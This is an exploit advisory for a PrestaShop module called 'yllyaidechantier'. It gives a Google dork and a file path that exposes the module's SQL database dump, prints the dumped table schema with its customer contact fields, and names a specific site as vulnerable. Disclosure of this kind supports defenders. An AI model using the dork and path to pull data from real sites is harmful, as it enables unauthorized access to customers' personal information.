########################################################################### # Exploit Title : PrestaShop yllyaidechantier Modules 1.4.9.0 Database Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 24/12/2018 # Vendor Homepage : prestashop.com # Software Download Link : N/A # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.4.9.0 # Exploit Risk : Medium # Google Dorks : inurl:''/modules/yllyaidechantier/db/'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] ########################################################################### # Exploit : /modules/yllyaidechantier/db/ydb.sql ########################################################################### # Example SQL Database Dump Information Exposure => -- phpMyAdmin SQL Dump -- version 4.0.4 -- http://www.phpmyadmin.net -- -- Client: localhost -- GA(c)nA(c)rA(c) le: Lun 07 Avril 2014 A 16:27 -- Version du serveur: 5.5.20-log -- Version de PHP: 5.3.10 SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; SET time_zone = "+00:00"; /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8 */; -- -- Base de donnA(c)es: `velux` -- CREATE DATABASE IF NOT EXISTS `velux` DEFAULT CHARACTER SET latin1 COLLATE latin1_swedish_ci; USE `velux`; -- -------------------- ------------------------------------ -- -- Structure de la table `ps_y_aidechantier_demande` -- DROP TABLE IF EXISTS `ps_y_aidechantier_demande`; CREATE TABLE IF NOT EXISTS `ps_y_aidechantier_demande` ( `id_demande` int(11) NOT NULL AUTO_INCREMENT, `id_template ` int(11) NOT NULL, `id_customer` int(11) NOT NULL, `id_scenario` int(11) NOT NULL, `lastname` varchar(500) NOT NULL, `firstname` varchar(500) NOT NULL, `phone` varchar(50) NOT NULL, `email` varchar(500) NOT NULL, `fax` varchar(50) NOT NULL, `chantier_charpente` varchar(500) NOT NULL, `chantier_couverture` varchar(500) NOT NULL, `chantier_fenetre` varchar(500) NOT NULL, `chantier_raccord` varchar(500) NOT NULL, `chantier_isolation` varchar(500) NOT NULL, `chantier_domotique` varchar(500) NOT NULL, `date_add` date NOT NULL, PRIMARY KEY (`id_demande`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ; -- ---------------- ---------------------------------------- -- -- Structure de la table `ps_y_aidechantier_scenario` -- DROP TABLE IF EXISTS `ps_y_aidechantier_scenario`; CREATE TABLE IF NOT EXISTS `ps_y_aidechantier_scenario` ( `id_scenario` int(11) NOT NULL AUTO_INCREMENT, `id_template` int(11) NOT NULL, `title` varchar(500) NOT NULL, `price` double NOT NULL, `date_add` date NOT NULL, PRIMARY KEY (`id_scenario`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=3 ; -- -------------------------------------------------------- -- -- Structure de la table `ps_y_aidechantier_template` -- DROP TABLE IF EXISTS `ps_y_aidechantier_template`; CREATE TABLE IF NOT EXISTS `ps_y_aidechantier_template` ( `id_template` int(11) NOT NULL AUTO_INCREMENT, `id_product` int(11) NOT NULL, `name` varchar(500) NOT NULL, `date_add` date NOT NULL, PRIMARY KEY (`id_template`), UNIQUE KEY `id_product_2` (`id_product`), KEY `id_product` (`id_product`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=8 ; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; ########################################################################### # Example Vulnerable Site => [+] portailpro.fr/modules/yllyaidechantier/db/ydb.sql ########################################################################### # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team ###########################################################################